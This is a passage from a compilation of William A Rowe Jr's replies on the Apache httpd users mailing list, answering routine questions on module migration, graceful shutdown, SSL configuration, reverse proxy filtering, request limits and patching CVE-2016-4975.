file to fingerprint to decide if it is 1MB or smaller, dynamic content
can't be toggled as you've ask in your top post through a 'filesize'
mechanism. Given a response from the backend that has a Content-Length, it
could be finagled, but otherwise requires buffering all 1MB first to decide
if a Transfer-Encoding: chunked backend response is going to add up to 1MB
or not.


On Thu, Jan 10, 2019 at 4:00 PM Srikanth Pippari 
wrote:

> Hello,
>
>
>
> Do we have any option to compress only  above 1MB size files in Apache 2.4?
>
>
>
> Thanks & Regards
>
> --
>
> Srikanth Pippari  | V3OPS team.
>
> Email ID : spipp...@vitechinc.com
>
> ---
>
>
>
> This e-mail message and any files transmitted with it may contain
> confidential and proprietary information and are intended solely for the
> use of the individual or entity to which they are addressed. Any
> unauthorized review, use, disclosure or distribution is strictly
> prohibited. If you have received this e-mail in error please notify the
> sender by reply email and destroy all copies of the original message. Thank
> you for your cooperation.
>

Re: [users@httpd] URGENT: Apache HTTP Migration from 1.3 to 2.4 UNIX Solaris

[William A Rowe Jr]

On Tue, Jan 8, 2019 at 10:48 AM  wrote:

>
> I have migrated a user module mod_example from 1.3 to 2.4. But when I try
> to start the apache it is giving a segmentation fault and creating a core.
>
> Following is the stacktrace while debug:
> t@1 (l@1) signal SEGV (no mapping at the fault address) in strlen at
> 0xfefcceb8
> 0xfefcceb8: strlen+0x0018:  ldub [%o2], %o1
> Current function is apr_pstrdup
>77   len = strlen(s) + 1;
> (dbx) where
> current thread: t@1
>   [1] strlen(0x1, 0xed568, 0x1, 0xed558, 0x1, 0x0), at 0xfefcceb8
> =>[2] apr_pstrdup(a = 0xb8190, s = 0x1 ""), line
> 77 in "apr_strings.c"
>   [3] ap_add_module_commands(m = 0xfebc80d8, p = ),
> line 546 in "config.c"
>   [4] ap_add_module(m = 0xfebc80d8, p = 0xb8190, sym_name =  unavailable>), at 0x5db30
>   [5] ap_add_loaded_module(mod = 0xfebc80d8, p = 0xb8190, short_name =
> 0xed510 "example_module"), line 713 in "config.c"
>   [6] load_module(cmd = 0xffbfec90, dummy = , modname =
> 0xed510 "example_module", filename = ), line 302 in
> "mod_so.c"
>
> This is happening while loading a user module that I created:
> LoadModule example_module modules/mod_example.so
>
> Please provide your valuable insight into it so that I can go forward.
>

The info above is a bit limited in diagnosing the specifics of source code
you didn't share, and we aren't that great at divining the invisible, so two
thoughts for you; first build an httpd/apr/your module with CFLAGS -g -O0.
Sometimes you can only reproduce a crash with an optimized build, but
the -g flag always remains useful in this regard (and objcopy can strip
those symbols for general distribution.) I'm guessing the above was built
with '-g' but with some '-O', optimizing out some of the args that might
have been helpful.

Since we can't see above which command in your command_rec array
caused this segfault, we can see you had an invalid string element.

Line 546 of config.c tripped over your input. config.c:546 was trying to;
dir = apr_pstrdup(tpool, cmd->name);

This suggests you added a command to the list without an actual char*
string name value.

Compare your command_rec list with the templates of the various
AP_INIT_* macros to ensure you provided valid initializers... only
static const array values. Ensure you NULL terminate that list.

Re: [users@httpd] Graceful shutdown of apache

[William A Rowe Jr]

On Mon, Dec 10, 2018 at 11:11 AM Hemant Chaudhary <
hemantdude.chaudh...@gmail.com> wrote:

> Hi,
>
> I have updated apache-2.4.29 to apache-2.4.37 but still I am not able to
> graceful shutdown in debug mode.
>
> Can you please tell me how should achieve it. ? or let me know the
> function which I should call for proper graceful shutdown.
>

Each MPM (event, worker, process) has it's own signaling architecture
between parent and child processes.

The parent process signaling is documented here;
https://httpd.apache.org/docs/2.4/stopping.html

You will need to review the behavior of the child signal handler specific
to the MPM you want to control.

Quoting the doc above; "You will notice many httpd executables running on
your system, but you should not send signals to any of them except the
parent, whose pid is in the PidFile. That is to say you shouldn't ever need
to send signals to any process except the parent. There are four signals
that you can send the parent: TERM, USR1, HUP, andWINCH, which will be
described in a moment."

So what you seek to do is, effectively undocumented/unsupported. Debug mode
is not a supported operating mode, as I mentioned earlier.

Re: [users@httpd] Configuring redirects from http to https

[William A Rowe Jr]

On Fri, Nov 30, 2018 at 1:40 PM Jack M. Nilles  wrote:

> # http redirect
>>> 
>>>
>>> 
>>>
>> Note you have an error there, the incoming request will be matched to
only one list of matching VirtualHosts, host1.com alone on the first,
and host2 alone on the second list. You surely meant these to share
the same name-based virtual host lists?

Re: [users@httpd] Using redis for caching Apache requests

[William A Rowe Jr]

You will have to go out of your way to disable TLS tickets. In the course of
normal operations, you won't see many cached TLS sessions at all, because
the ticket is returned to the client, and the client re-presents that
ticket to
reestablish the session; no session caching required.

http://httpd.apache.org/docs/2.4/mod/mod_ssl.html#sslsessiontickets

This is preferable to the session cache, so don't leave it disabled after
testing the session cache behavior. If you are running mod_status, you
can see the cached sessions stats.


On Fri, Nov 23, 2018 at 3:51 AM Ananya Dey  wrote:

> Hi,
>
> I am trying to cache the requests coming on my Apache web server using the
> mod_socache_redis module. After loading the module, I am sending a request
> from Apache to my redis server in the following format-
> SSLSessionCache redis://localhost:4321
> 4321 is the port on which the redis server has started.
> However when I am checking the status of my redis server, there is no
> update of the apache requests. Can anyone please guide me on how to go
> about this? Particularly on how to set my request values onto the redis
> cache directly from Apache.
>
> Thanks
> Ananya
>

Re: [users@httpd] Graceful shutdown of apache

[William A Rowe Jr]

Graceful shutdown is a WINCH signal.

In -X mode you don't have a parent -> children relationship with httpd,
just the worker process. It isn't for normal operation.



On Thu, Nov 22, 2018 at 7:28 AM Hemant Chaudhary <
hemantdude.chaudh...@gmail.com> wrote:

> Hi,
>
> I am not able to shutdown apache gracefully if I am starting apache in
> debug mode i:e (./httpd -X) with worker mpm. I am sending kill -term PID to
> httpd process. wherease the same command is working with prefork.
>
> How should I stop worker mpm if started in debug mode ?
>
>
> Thanks
> Hemant
>

Re: [users@httpd] URGENT: Apache HTTP Migration from 1.3 to 2.0 UNIX Solaris

[William A Rowe Jr]

You are absolutely right, there is a NULL quadword at the expected position
of the module signature. How this happened is the question.

Could it be possible that you are still compiling against httpd 1.3 include
files? The ordering of the module structure has changed. If the -I include
paths are correct, this shouldn't happen, but if you have an installed very
old httpd in place in the system paths, and the compiler isn't treating the
-I include paths in priority, this would happen.




On Wed, Nov 14, 2018 at 1:48 PM  wrote:

> We have used the same compiler for both.
>
> My main concern is "expected signature 41503234 but saw **"
>
> What could be the reason of signature **?
>
> This implies that no signature is generated in my case
>
> Thanks & Regards
> Ankit Singhal
> Tata Consultancy Services
> Mailto: singhal.an...@tcs.com
> Website: http://www.tcs.com
> 
> Experience certainty.IT Services
>Business Solutions
>Consulting
> 
>
>
>
>
> From:Eric Covener 
> To:users@httpd.apache.org
> Date:14-11-2018 15:58
> Subject:Re: [users@httpd] URGENT: Apache HTTP Migration from 1.3
> to 2.0 UNIX Solaris
> --
>
>
>
> "External email. Open with Caution"
>
> Do you use a "similar" compiler for httpd and the module?
> On Wed, Nov 14, 2018 at 1:56 PM  wrote:
> >
> > Hi All,
> >
> > Thank you Rick and William for helping me out.
> >
> > As suggested I had use the apxs to build a module.
> > Steps as follows:
> >
> > 1> I have commented my module and try to start the apache and it started.
> >
> > 2> I took the default example file that comes with
> httpd-2.4.34(httpd-2.4.34/modules/examples/mod_example_hooks.c) and compile
> it with apxs by following command:
> > apxs -c mod_example_hooks.c
> >
> > 3> Above command automatically created a folder .libs and in this there
> is .so created(.libs/mod_example_hooks.so)
> >
> > 4> When I loaded the created module and try to start the apache then
> also it is giving the same error.
> >
> > quartz: /usr/local/apache2.4.34/conf/extra > apache2.4 start
> > httpd: Syntax error on line 490 of
> /usr/local/apache2.4.34/conf/httpd.conf: Syntax error on line 6 of
> /usr/local/apache2.4.34/conf/extra/httpd-quartz.conf: API module structure
> 'example_hooks_module' in file
> /app/quartz/COMS/EAI_324/ph/http/src/.libs/mod_example_hooks.so is garbled
> - expected signature 41503234 but saw  - perhaps this is not an
> Apache module DSO, or was compiled for a different Apache version?
> >
> >
> >
> > Thanks & Regards
> > Ankit Singhal
> > Tata Consultancy Services
> > Mailto: singhal.an...@tcs.com
> > Website: http://www.tcs.com
> > 
> > Experience certainty.IT Services
> >Business Solutions
> >Consulting
> > 
> >
> >
> >
> >
> > From:"Houser, Rick" 
> > To:"users@httpd.apache.org" 
> > Date:13-11-2018 14:40
> > Subject:RE: [users@httpd] URGENT: Apache HTTP Migration from
> 1.3 to 2.0 UNIX Solaris
> > 
> >
> >
> >
> > "External email. Open with Caution"
> >
> > While that is one approach, I'm afraid it won't speed up your exercise;
> it is most
> > direct to get 2.4 going.
> >
> >
> > Something that will likely speed your transition is to split your task
> into as small of portions as possible, and tackle those one at a time from
> a higher level perspective.  For example, if a module is doing some custom
> authentication, look at what’s available in 2.4 already and see if
> something now stock can do the job, or at least get you 90% of the way
> there and serve as an updated template for your code.  For example, there
> are already modules for authentication providers like ldap, content
> caching, database access, etc.
> >
> > The time savings on the simplified troubleshooting steps are likely to
> be far from insignificant, and you would have the benefit of a more
> standardized/modern codebase.  For example, get the server up and running
> with static content, then compile one module with apxs, get it to load,
> then work on the related config.  Work through any issues you find with

Re: [users@httpd] URGENT: Apache HTTP Migration from 1.3 to 2.0 UNIX Solaris

[William A Rowe Jr]

On Tue, Nov 13, 2018 at 11:04 AM  wrote:

>
> Our main objective is to migrate to 2.4. Since I faced an issue while
> doing so, I thought it would be better to first migrate to 2.0 then to 2.2
> and finally to 2.4.
>

While that is one approach, I'm afraid it won't speed up your exercise; it
is most
direct to get 2.4 going.


> In 2.4 itself the error is same.
>
> The signature created turns out to be . I could not understand
> this part. I have gone through the internet and there are always some
> definite signature is available but in my case it turned out to be 0.
>

It is not a loadable library object.  Rather than fighting with cc's flags,
review
the helper utility;

  https://httpd.apache.org/docs/2.4/programs/apxs.html

This will make your life much simpler for compiling and linking loadable
modules. It retains the flags initially used for compiling httpd and
modules, so that the results are consistent.

Re: [users@httpd] URGENT: Apache HTTP Migration from 1.3 to 2.0 UNIX Solaris

[William A Rowe Jr]

On Mon, Nov 12, 2018 at 10:38 AM  wrote:
>
> I have installed and set up httpd 2.0.65 version of apache server on
Solaris 11

Speaking for most readers of this list, we wonder why... what would lead
you to such a silly act? Is this in the syllabus/exercises inflicted by a
cruel
teaching assistant?

Since Apache httpd 2.0.65 was released and discontinued over five years
ago, this community discontinued help for it. You are welcome to leave your
question to be answered by a very helpful person with a long memory, but
you would be much more likely to receive help from the community if you ask
about any supported version, at least some flavor of 2.4.x, at least one
which
was released this year.

We will offer you a single hint, it wouldn't be wise to try to replicate
each and
every compilation flag to ensure compatibility when building a module.
That's
what the apxs utility script installed alongside httpd is for.

Re: [users@httpd] Patch request for Apache 2.4.x for the CVE-2016-4975

[William A Rowe Jr]

On Mon, Nov 5, 2018 at 1:25 AM Andrew Joshwa <4andrewjosh...@gmail.com>
wrote:

> Hi,
>
> Can anyone please help me to get the patch for the CVE-2016-4975.
>

Yes, http://www.apache.org/dist/httpd/, obtain and build the latest version
of 2.4.
Or if you want to avoid the TLS 1.3 enhancement, you may want to obtain
2.4.35
from http://archive.apache.org/dist/httpd/ (at minimum, 2.4.27, which
corrects
shortcomings of the patch you note below.)


> I have found the below link for patch from internet.
> https://svn.apache.org/viewvc?view=revision=1772678
> However this contains many changes.
>

There were further changes. The branch of all changes you are asking for is;

https://svn.apache.org/repos/asf/httpd/httpd/branches/2.4.x-merge-http-strict/

Please let me know if we need to port all changes mentioned in above patch
> OR please let me know if specific revision can be ported to fix
> CVE-2016-4975
>

This particular CVE is easily addressed by a patch to encode the mod_userdir
inputs. Not using mod_userdir external redirects is equally simple and
similarly
solves the issue . Avoiding mod_alias as well as mod_rewrite is quite
challenging..

Unfortunately this class of vulnerabilities could not be addressed in a
simple fix.

The entire patch is needed to protect the client / proxy / backend from
malicious
input. We refactored the way request and response text was handled to guard
against this entire class of exploits.

Re: [users@httpd] RE: Warning from users@httpd.apache.org

[William A Rowe Jr]

It is a confusing message. Your mail server is rejecting some messages sent
to you by the list server, perhaps because it detects spam, perhaps because
there was a short window the server was down/in maintenance.

On Sat, Nov 3, 2018, 08:26 Leland  Your messages are the only ones being bounced. It's strange that I'm
> receiving the digest emails. If you think I have the problem, go ahead and
> remove me. If my system is 'bouncing' your message, why did I see this
> one??
>
> I'm receiving all other emails just fine so the problem is on your end, not
> mine. Please remedy your problem.
> Thanks for the WARNING!
>
> Regards,
>
> Leland Harrell  k...@k5gu.com
>
>
> -Original Message-
> From: users-digest-h...@httpd.apache.org
> [mailto:users-digest-h...@httpd.apache.org]
> Sent: Friday, November 02, 2018 3:59 PM
> To: k...@k5gu.com
> Subject: Warning from users@httpd.apache.org
>
> Hi! This is the ezmlm program. I'm managing the
> users-dig...@httpd.apache.org mailing list.
>
>
> Messages to you from the users-digest mailing list seem to
> have been bouncing. I've attached a copy of the first bounce
> message I received.
>
> If this message bounces too, I will send you a probe. If the probe bounces,
> I will remove your address from the users-digest mailing list,
> without further notice.
>
>
> I've kept a list of which digests from the users-digest-digest mailing list
> have bounced from your address. For each digest you missed, I have
> noted the number of the first message in the digest. I do not archive
> the digests themselves, but you may be able to get the messages
> from the main list archive.
>
> To retrieve a set of messages 123-145 (a maximum of 100 per request),
> send a short message to:
>
>
> To receive a subject and author list for the last 100 or so messages,
> send a short message to:
>
>
> Here are the digest message numbers:
>
>118101
>
> --- Enclosed is a copy of the bounce message I received.
>
> Return-Path: <>
> Received: (qmail 11330 invoked for bounce); 23 Oct 2018 17:04:55 -
> Date: 23 Oct 2018 17:04:55 -
> From: mailer-dae...@apache.org
> To: users-digest-return-1181...@httpd.apache.org
> Subject: failure notice
>
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] unescape urlencoded

[William A Rowe Jr]

Hi Simon,

you might want to express your interest/RFE to the d...@apr.apache.org list,
since that is where the apr_* functions are maintained, and enhancement
requests are always welcome.


On Thu, Oct 25, 2018 at 8:37 PM Simon Walter  wrote:

> I see apr_escape_urlencoded, but not apr_unescape_urlencoded. Perhaps it
> is apr_unescape_url and there is some fun with the naming. Looking at
> the tests, they do not seem as rigorous. A brief look at
> encoding/apr_escape.c and I see x2c and c2x. I want to ask you all as
> the docs mention
> http://www.w3.org/TR/html401/interact/forms.html#h-17.13.4.1 for
> apr_escape_urlencoded and not for apr_unescape_url.
>
> I am want to decode form data in my own application (not a module).
>
> Best,
>
> Simon
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] Reverse proxy not sending certificate

[William A Rowe Jr]

A number of regressions are fixed in 2.4.35, please retest against that
version.


On Fri, Oct 12, 2018, 15:27 Schettler, Marty L. <
martin.l.schett...@leidos.com> wrote:

> My reverse proxy config doesn’t work with SSL any more as I try to upgrade
> from 2.4.29 to 2.4.34.
>
>
>
> My config:
>
>
>
> SSLProxyEngine On
>
> SSLProxyMachineCertificateFile /path/to/server_crt_and_key.crt
>
> SSLProxyCACertificatePath /etc/cacerts
>
>
>
> 
>
>   ProxyPass https://host01:9443/p
>
>   ProxyPassReverse https://host01:9443/p
>
>   SSLVerifyClient require
>
> 
>
>
>
>
>
> Again, this works just fine with 2.4.29. However, in 2.4.34 I get a 502 in
> my browser “Error reading from remote server” and my httpd log file has a
> warning “AH02268: Proxy client callback: (host01:443) downstream server
> wanted client certificate but none are configured.” Is this possible
> related to PR 62232? If so, I thought it would have been fixed in 2.4.32.
>
>
>
> Any help is greatly appreciated!!
>
>
>
> Marty
>

Re: [users@httpd] Get request of large file size greater than 100KB

[William A Rowe Jr]

I've looked at the httpd and apr code, what source package were you using
which started from a default MAX_IOVEC_TO_WRITE (APR_MAX_IOVEC_SIZE?) of 6?

TIA,

Bill

On Thu, Sep 27, 2018 at 11:59 AM Hemant Chaudhary <
hemantdude.chaudh...@gmail.com> wrote:

> Hi,
>
> I have solved the problem by changing MAX_IOVEC_TO_WRITE value to 6 from
> 16. Now maximum data will be 8KB*6=48KB, which is less than writev max
> limit of 52KB.
>
> Thanks
> Hemant
>
> On Thu, Sep 27, 2018 at 7:56 PM Googalar 
> wrote:
>
>> Perhaps this thread will help you out...
>>
>> https://stackoverflow.com/questions/33811543/php-and-mod-fcgid-ap-pass-brigade-failed-in-handle-request-ipc-function#
>> On Thu, Sep 27, 2018 at 1:15 AM Hemant Chaudhary
>>  wrote:
>> >
>> > Hi All,
>> >
>> > I am trying to access large file(get request) of large file. This is
>> working properly if size of file is less than 52KB. But size greater than
>> 52KB is giving me error 4022.
>> >
>> > I have debugged and come to know that writev function can write maximum
>> upto 52KB only. Therefore I changed the default value of
>> THRESOLD_MAX_BUFFER to 42KB so that my writev will not reach to 52KB.
>> THRESOLD_MAX_BUFFER to 42KB helps me to solve the issue for PUT request.
>> >
>> > But in get request while accessing large file, size of brigade crosses
>> 52KB. As 52KB is greater than THRESOLD_MAX_BUFFER(42KB). It is trying to
>> flush the data. But limit of writev on my OS is maximum 52KB only.
>> Therefore it is giving 4022 error.
>> >
>> > Is there any way where I can control apache so that size of brigade
>> will never cross 52KB? or any other approach/ configuration parameter can
>> be used to solve this issue ?
>> >
>> > Thanks
>> > Hemant
>>
>> -
>> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
>> For additional commands, e-mail: users-h...@httpd.apache.org
>>
>>

Re: [users@httpd] Compiling 2.4.34 on linux against a non system openssl version

[William A Rowe Jr]

libcrypt has nothing to do with libcrypto/libssl of openssl. They can be
loaded in parallel. Because crypt was implemented in triple DES 156 bit,
proven to convey only 112 bits of encryption strength, that cipher is no
longer a part of openssl. But the system library for crypt'ed passwords
remains.




On Sep 18, 2018 14:51, "Matthew Goebel"  wrote:


  HHmm... okay.  The issue I'm having is that crypt() no longer seems to
exist in openssl 1.1.0, which is what apr_util is testing for, and when it
cannot find it in 1.1.0 it decides to use the 1.0.0 version
of the system libsso apr-util and httpd are built with 1.0.0 and
mod_ssl with 1.1.0

  Guess I will try to contact some of the sites providing httpd 2.4.x
binaries with 1.1.0 support and ask about how they are handling apr-util.

Thanks,
Matt


On Tue, Sep 18, 2018 at 2:04 PM, William A Rowe Jr 
wrote:

> On Tue, Sep 18, 2018 at 10:24 AM Matthew Goebel  wrote:
>
>> Ah, and I've been looking at httpd instead of mod_ssl.so, this does in
>> fact appear to be working... ugh... never mind me.
>>
>
> No worries, but please note that apr-util can be built linking to openssl,
> and if that optional apr_crypto_openssl module is triggered before httpd
> loads mod_ssl, it may resolve the wrong library, so you may want to get
> the appropriate -R path into the apr-util build.
>
> Also, apr-util can load one of many different keyed or relational DB
> or ldap providers, most of which have linkages to a crypto provider.
> Those may be hard-wired to load and require an older openssl, and
> you will need to rebuild the whole db/sql/ldap provider lib against
> the more modern openssl.
>
>


-- 
Matthew Goebel : goe...@emunix.emich.edu : Unix Jockey @ EMU : Hail Eris
Neo-Student, Net Lurker, Donut consumer, and procrastinating medher...
 "Always with the negative waves, Moriarty" - Oddball
 "Comfort the troubled, and trouble the comfortable." - Dietrich Bonhoeffer

Re: [users@httpd] Compiling 2.4.34 on linux against a non system openssl version

[William A Rowe Jr]

On Tue, Sep 18, 2018 at 10:24 AM Matthew Goebel  wrote:

> Ah, and I've been looking at httpd instead of mod_ssl.so, this does in
> fact appear to be working... ugh... never mind me.
>

No worries, but please note that apr-util can be built linking to openssl,
and if that optional apr_crypto_openssl module is triggered before httpd
loads mod_ssl, it may resolve the wrong library, so you may want to get
the appropriate -R path into the apr-util build.

Also, apr-util can load one of many different keyed or relational DB
or ldap providers, most of which have linkages to a crypto provider.
Those may be hard-wired to load and require an older openssl, and
you will need to rebuild the whole db/sql/ldap provider lib against
the more modern openssl.

Re: [users@httpd] Unable to set ciphers string with space separated in apache

[William A Rowe Jr]

On Wed, Sep 5, 2018 at 10:11 PM, alchemist vk 
wrote:

> Hi William,
>   Sorry for late response.. I appreciate your response.
>   Small clarification: You meant to say,  with space as delimiter, httpd
> parses will consider  space separated tokens as each individual httpd
> directives?
>

The syntax of SSL_CMD_ALL(CipherSuite, TAKE1, ...) states that only a
single token is permitted (confirmed in 2.4.current).

It will consider each token individual arguments, and only one is
permitted. Placing the space-seperated tokens within double quotes causes
httpd to treat it as a single argument to SSLCipherSuite. It still may not
work, we only "support" colon-separated lists, as documented, but pass the
string given, and the rest is up to OpenSSL.


> On Mon, Aug 27, 2018 at 7:03 PM, William A Rowe Jr 
> wrote:
>
>> A good argument for following httpd documented convention.
>>
>> If you want to continue exploring, you would want to quote the cipher
>> string, since httpd would take apart unquotes, space separated tokens as
>> different httpd directive arguments, and you surely don't want that.
>>
>> On Sat, Aug 25, 2018, 20:05 alchemist vk  wrote:
>>
>>> Hi All,
>>>
>>>   openssl standard says " The cipher list consists of one or more *cipher
>>> strings* separated by colons. Commas or spaces are also acceptable
>>> separators but colons are normally used".  But apache says "directive
>>> uses a *colon-separated* *cipher-spec* string consisting of OpenSSL
>>> cipher specifications to configure the Cipher Suite the client is permitted
>>> to negotiate in the SSL handshake phase" in https://httpd.apache.org/do
>>> cs/2.4/mod/mod_ssl.html.
>>>
>>>
>>> So, when I configured apache by separating cipher string with spaces,
>>> cipher string has no affect.  But when cipher string is configured with
>>> colons, cipher string has effect.
>>>
>>>
>>> So, please provide clarification, is there any limitation why we can’t
>>> configure cipher string by using space as delimiter in apache.
>>>
>>>
>>> PS: I am using 2.4 apache version in Linux OS.
>>>
>>> With Regards,
>>> Venkatesh
>>>
>>
>

Re: [users@httpd] Reverse Proxy trouble with mod_substitute

[William A Rowe Jr]

The proxy response input is dechunked as it is retrieved from the back end.
Any chunking to the client is introduced by httpd after filtering.

It may be that the request deflate and inflate filters have comingled a
zlib stream context?

On Tue, Sep 4, 2018, 12:43 Maarten Boekhold  wrote:

> Hi,
>
> But I did try to inflate/rewrite/deflate in my first email... It just
> didn't work. I suspect something failed because the data was chunked...
>
> Maarten
>
> On September 4, 2018 20:20:18 "Gillis J. de Nijs" 
> wrote:
>
>> Yes, it is.  You can't rewrite something that's gzipped, so you'd have to
>> unzip it first, or - like you did - never have it gzipped in the first
>> place.
>>
>> See also http://www.apachetutor.org/admin/reverseproxies where there's a
>> full reverse proxy scenario configured and explained.  It uses the same
>> technique you did, and alternatively suggests you can deflate, rewrite,
>> inflate, if you so desire.
>>
>> Regards,
>> Gillis
>>
>> On Tue, Sep 4, 2018 at 3:19 PM, Maarten Boekhold 
>> wrote:
>>
>>> Hi all,
>>>
>>> I decided to force HTTPD to remove the Accept-Encoding: gzip, deflate
>>> from the request, using:
>>>
>>> RequestHeader unset Accept-Encoding
>>>
>>> Now the response is properly processed by HTTPD. So it's likely an issue
>>> with one or both of:
>>>
>>> Content-Encoding: gzip
>>> Transfer-Encoding: chunked
>>>
>>> Is this a known limitation?
>>>
>>> Regards, Maarten
>>>
>>>
>>>
>>> On 09/04/2018 11:53 AM, Maarten Boekhold wrote:
>>>
 Hi all,

 Apache HTTPD 2.4.34 on Windows 10 downloaded from Apache Haus.

 I'm trying to move a corporate application behind a reverse proxy. In
 the process, I need to move the path this application is published on,
 eg:

 /webapp1 --> /suite/webapp1

 "webapp1" contains a specific JSP that returns an HTML page with a lot
 of JavaScript inside, which hardcodes an absolute path "/service1". I
 need to move that one as well to under the external "/suite/service1"
 path.

 The GET /webapp1/the.jsp request has the following headers:

  GET /webapp1/the.jsp HTTP/1.1
  Accept: image/gif, image/jpeg, image/pjpeg,
 application/x-ms-application, application/xaml+xml,
 application/x-ms-xbap, */*
  Referer: 
  Accept-Language: en-US
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0;
 WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; Tablet PC 2.0)
  Accept-Encoding: gzip, deflate
  Host: 
  Connection: Keep-Alive
  Cookie: JSESSIONID=24B3D3B40235B8E889A5F019081AAB41

 The response (non-proxied) has the following headers

  HTTP/1.1 200
  Strict-Transport-Security: max-age=31536000;includeSubDomains
  X-Frame-Options: SAMEORIGIN
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  Content-Type: text/html;charset=ISO-8859-1
  Transfer-Encoding: chunked
  Content-Encoding: gzip
  Vary: Accept-Encoding
  Date: Tue, 04 Sep 2018 06:52:12 GMT
  Server: 

 I've set up the following in httpd.conf:

  FilterDeclare INFLATE_HTML CONTENT_SET
  FilterProvider INFLATE_HTML INFLATE "%{CONTENT_TYPE} =~
 m|^text/html|"
  FilterProtocol INFLATE_HTML change=yes
  FilterTrace INFLATE_HTML 1

  FilterDeclare DEFLATE_HTML
  FilterProvider DEFLATE_HTML DEFLATE "%{CONTENT_TYPE} =~
 m|^text/html|"
  FilterProtocol DEFLATE_HTML change=yes
  FilterTrace DEFLATE_HTML 1

  FilterDeclare SUBST_HTML
  FilterProvider SUBST_HTML SUBSTITUTE "%{CONTENT_TYPE} =~
 m|^text/html|"
  FilterTrace SUBST_HTML 1

  
  FilterChain +INFLATE_HTML +SUBST_HTML +DEFLATE_HTML

  ProxyPass ${internal}/webapp1/the.jsp
  ProxyPassReverse ${internal}/webapp1/the.jsp

  Substitute s|/service1|/suite/service1|n
  

 This doesn't work. I can see the request being forwarded to the internal
 application server, which executes successfully and responds with 200,
 but something inside HTTPD doesn't work, and it ends up at the browser
 with a 504 and no data (looking at this with Fiddler).

 The HTTPD error.log file contains:


 [Tue Sep 04 10:24:41.036087 2018] [proxy:trace1] [pid 452:tid 1352]
 mod_proxy.c(766): [client 192.168.1.12:50120] AH03464: URI path
 '/suite/webapp1/the.jsp' matches proxy handler
 'proxy:https://internal/webapp1/the.jsp', referer: 
 [Tue Sep 04 10:24:41.036087 2018] [proxy:trace2] [pid 452:tid 1352]
 proxy_util.c(2106): [client 192.168.1.12:50120] https: found worker
  for /webapp1/the.jsp, referer: 
 [Tue Sep 04 10:24:41.036087 2018] [proxy:debug] [pid 452:tid 1352]
 mod_proxy.c(1246): [client 192.168.1.12:50120] AH01143: Running scheme
 

Re: [users@httpd] Large authorization header returning error 400

[William A Rowe Jr]

On Wed, Aug 29, 2018 at 3:12 AM, Audebert Bernard 
wrote:

>
> The request work fine with Authorization header line of up to at least
> 5674 bytes but break with Authorization header of more than 6178 bytes with
> the following answer :
>
> Here is an excert of the server-info page we have activated to ensure that
> the LimitRequestFieldSize was high enough (curently set at ~40k)
>
>
> 129: LimitRequestBody 52428800
> 130: LimitRequestFields 50
> 131: LimitRequestFieldsize 40960
> 132: LimitRequestLine 40960
>

These settings are global? Or did you restrict them to a named vhost? You
don't give enough context here.

It is too late to limit them in a vhost, because the limits are applied
during the reading of the request from network, before the host (other than
first-physical ip:port host) has been deciphered.

Move these to the global config and it should be fine.

Re: [users@httpd] Unable to set ciphers string with space separated in apache

[William A Rowe Jr]

A good argument for following httpd documented convention.

If you want to continue exploring, you would want to quote the cipher
string, since httpd would take apart unquotes, space separated tokens as
different httpd directive arguments, and you surely don't want that.

On Sat, Aug 25, 2018, 20:05 alchemist vk  wrote:

> Hi All,
>
>   openssl standard says " The cipher list consists of one or more *cipher
> strings* separated by colons. Commas or spaces are also acceptable
> separators but colons are normally used".  But apache says "directive
> uses a *colon-separated* *cipher-spec* string consisting of OpenSSL
> cipher specifications to configure the Cipher Suite the client is permitted
> to negotiate in the SSL handshake phase" in
> https://httpd.apache.org/docs/2.4/mod/mod_ssl.html.
>
>
> So, when I configured apache by separating cipher string with spaces,
> cipher string has no affect.  But when cipher string is configured with
> colons, cipher string has effect.
>
>
> So, please provide clarification, is there any limitation why we can’t
> configure cipher string by using space as delimiter in apache.
>
>
> PS: I am using 2.4 apache version in Linux OS.
>
> With Regards,
> Venkatesh
>

Re: [users@httpd] configuring mod_proxy_ftp for client ip logging

[William A Rowe Jr]

Rereading your question, you are asking whether FTP protocol offers the
equivalent of x-forwarded-for http header.

The answer is, no, you can't accomplish what you are seeking. See
https://devcentral.f5.com/questions/how-to-insert-client-ip-address-in-tcp-profile-for-ftp-connections
and dozens of other posts asking the same question.

It's an entirely reasonable extension of FTP, which if it existed,
mod_proxy_ftp could be enhanced to support.



On Jul 25, 2018 23:34, "William A Rowe Jr"  wrote:

If I understand your question, mod_proxy_ftp does not speak ftp to the
client; only between the httpd server and backend. So the only data channel
is the one established by httpd to shuttle the data.



On Tue, Jul 24, 2018, 12:28 Harbo, Peter  wrote:

> The mod_proxy_ftp module is working fine for me using release 2.4.25 to
> send urls matching a pattern to a proftpd server running on the same
> system.  I have noticed that the source IP address in the ftpd log is the
> same as the httpd running the mod_proxy_ftp module.  Am I correct in
> assuming that neither mod_remoteip nor any other configuration options of
> httpd can cause httpd's ftp proxy module to spoof the IP address of the
> client sending the request to httpd?  Otherwise this works nicely but we
> need the correct IP addresses in the proftpd log for metrics.
>

Re: [users@httpd] configuring mod_proxy_ftp for client ip logging

[William A Rowe Jr]

If I understand your question, mod_proxy_ftp does not speak ftp to the
client; only between the httpd server and backend. So the only data channel
is the one established by httpd to shuttle the data.



On Tue, Jul 24, 2018, 12:28 Harbo, Peter  wrote:

> The mod_proxy_ftp module is working fine for me using release 2.4.25 to
> send urls matching a pattern to a proftpd server running on the same
> system.  I have noticed that the source IP address in the ftpd log is the
> same as the httpd running the mod_proxy_ftp module.  Am I correct in
> assuming that neither mod_remoteip nor any other configuration options of
> httpd can cause httpd's ftp proxy module to spoof the IP address of the
> client sending the request to httpd?  Otherwise this works nicely but we
> need the correct IP addresses in the proftpd log for metrics.
>

Re: [users@httpd] "Permissions" lost after upgrade to 2.4.33

[William A Rowe Jr]

On Mon, Jul 16, 2018 at 4:53 PM, James Moe 
wrote:

>
>   After the upgrade from v2.4.23 to v2.4.33, https requests yield error
> 403:
> Access forbidden!
> You don't have permission to access the requested directory. There is
> either no index document or the directory is read-protected.
>

Likely answered elsewhere.


> http requests yield eroor 400:
> Bad request!
> Your browser (or proxy) sent a request that this server could not
> understand.
>

